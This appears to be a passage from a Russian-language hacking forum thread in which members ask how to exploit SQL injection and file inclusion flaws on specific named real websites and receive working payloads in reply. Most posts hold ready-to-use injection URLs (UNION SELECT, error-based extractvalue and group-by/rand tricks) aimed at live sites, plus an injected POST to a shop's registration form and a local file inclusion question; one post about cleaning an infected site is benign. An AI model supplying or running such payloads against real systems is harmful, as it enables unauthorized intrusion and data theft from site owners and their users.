Старый 18.11.2012, 14:07   #2521
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
подскажите пожалуйста как тут раскрутить?
Код:
http://4x4typ.ru/market/section.php?id=1'
in your link,you are limited to only 2 chars,so you cant do anything.
so you can use Flakt's link,with union-
Код:
http://4x4typ.ru/links/index.php?order_by=&order_by_d=&name=0'union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14-- -
spari вне форума   Ответить с цитированием
Старый 20.11.2012, 06:49   #2522
Alx_Pr8
 
Регистрация: 20.11.2012
Сообщений: 2
Репутация: 0
По умолчанию

Доброго времени суток, подскажите такой вопрос:
Начну из далека, у друга самописный сайт, он там учится php и работе с различными cms, ни чего важного и интересного, поймал вирус, потыкался сам, ни чего у него не вышло, попросил меня, мол можно все и удалить, но жалко. Покапавший в коде сайта, нашел строки js кода, удалил, все встало на свои места.
Собственно сам вопрос: Если взять подобный заказ на фрилансе, то как себя обезопасить в плане что работу сделаешь, а заказчик свалит на твою голову проблемы с сайтом, (по типу у меня вот тут статья пропала, а я за нее 100$ платил) и где можно почитать про различные зловреды на сайтах, как я понимаю только js и iframe дело не ограничивается.

Из той же оперы вопрос по поводу пентеста\аудита сайта через тот же фриланс, составляется ли какой договор или все на доверии? Или может заказчик должен хоть документы какие-либо показать, что мол сайт действительно его?
Alx_Pr8 вне форума   Ответить с цитированием
Старый 20.11.2012, 09:05   #2523
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Alx_Pr8
Цитата:
Сообщение от Alx_Pr8 Посмотреть сообщение
где можно почитать про различные зловреды на сайтах, как я понимаю только js и iframe дело не ограничивается.
http://help.yandex.ru/webmaster/?id=1076109
http://help.yandex.ru/webmaster/?id=1071330

По сути, любой посторонний код.
Цитата:
Или может заказчик должен хоть документы какие-либо показать, что мол сайт действительно его?
Думаю, достаточно повесить баннер с каким-нибудь кодовым словом в качестве доказательства, что сайт ваш.
Untitled вне форума   Ответить с цитированием
Старый 23.11.2012, 16:26   #2524
devv
 
Регистрация: 08.10.2012
Сообщений: 27
Репутация: -4
По умолчанию

Помогите раскрутить 2 SQL:
http://ya-ob.ru/search/'/
http://www.rusrep.ru/search/?text=%27&send.x=0&send.y=0
Никак не получается ;(
devv вне форума   Ответить с цитированием
Старый 23.11.2012, 19:37   #2525
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
http://ya-ob.ru/search/'/
Скорее всего, уязвимый параметр попадает в два подряд идущих запроса, поэтому закрыв правильно первый, нарушаеся второй. Используйте error-based вывод:
Цитата:
http://ya-ob.ru/search/A'+AND+extractvalue(1,concat(0x3a,(SELECT+version( )+limit+0,1)))--+%23/
Цитата:
http://www.rusrep.ru/search/?text=%27&send.x=0&send.y=0
Вообще там SQL prepared statements, но может кто-то разрулит.
Untitled вне форума   Ответить с цитированием
Старый 23.11.2012, 20:27   #2526
devv
 
Регистрация: 08.10.2012
Сообщений: 27
Репутация: -4
По умолчанию

Untitled спасибо, а кроме extractvalue других вариантов не сработает? через extractvalue крутить не получится.
devv вне форума   Ответить с цитированием
Старый 24.11.2012, 09:53   #2527
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

Цитата:
http://ya-ob.ru/search/A%27/**/or/**/1/**/group/**/by/**/concat%28version%28%29,floor%28rand%280%29*2%29%29 having/**/min%280%29/**/or/**/1--+%23/
Вариантов вагон и маленькая тележка
azid вне форума   Ответить с цитированием
Старый 24.11.2012, 11:54   #2528
devv
 
Регистрация: 08.10.2012
Сообщений: 27
Репутация: -4
По умолчанию

Цитата:
Сообщение от azid Посмотреть сообщение
Вариантов вагон и маленькая тележка
Спасибо, пробую этот способ, но что то у меня и тут не получается:
http://ya-ob.ru/search/A'/**/or/**/1/**/group/**/by/**/concat((select/**/count(*)/**/from/**/information_schema.tables),floor(rand(0)*2))+havin g/**/min(0)/**/or/**/1--+%23/
Долго тыкал, в общем похоже на то, что после from идёт, не должно превышать определенного количества символов... хм, но раскрутить не получается таким запросом.
devv вне форума   Ответить с цитированием
Старый 24.11.2012, 18:07   #2529
DeepShadow
 
Регистрация: 24.11.2012
Сообщений: 5
Репутация: 0
По умолчанию

Наткнулся на 1 скулю интересную, MSSQL+INSERT...

POST /shopcustregister.asp

Host: www.totallyshoes.co.uk
Connection: Keep-alive
User-Agent: Mozilla/18.0
Content-Type: application/x-www-form-urlencoded

action=1'&blnmaillist=TRUE&straddress=alala&stradd ress2=ololo&strcity=LoL CiTy&strcountry=MO&strEmail=obama@usa.gov&strfirst name=hitman&strlastname=hitman&strpassword1=werw34 r523q&strpassword2=werw34r523q&strPhone=111-222-3333&strpostcode=94102

хотел оборвать запрос ; и провернуть что-то типа time based.... не прокатило... команды тож не выполняет (видимо права не те)

Чего-нить интересненькое можно замутить)? Или с инсертом только изменять записи в доступных базах/таблицах можно?

Последний раз редактировалось DeepShadow; 24.11.2012 в 18:13..
DeepShadow вне форума   Ответить с цитированием
Старый 24.11.2012, 18:12   #2530
Gloward
 
Регистрация: 24.11.2012
Сообщений: 1
Репутация: 0
По умолчанию

Есть ли способы использовать LFI в page.php, учитывая что UndefinedClass не определен при вызове page.php напрямую?

index.php:
PHP код:
<?php 
    
include(PANEL_ROOT.'UndefinedClassInit.php');    
    if ( 
IsAdmin($_GET['login'],$_GET['pass']) == true ) include(PANEL_ROOT.'page.php');
?>
page.php:
PHP код:
<?php
    $page 
$_GET['page'];
    
$UndefinedClass->glob['pageTitle'] = 'MyPanel';
    include(
PANEL_ROOT.$page);
?>

Последний раз редактировалось Gloward; 24.11.2012 в 18:22..
Gloward вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot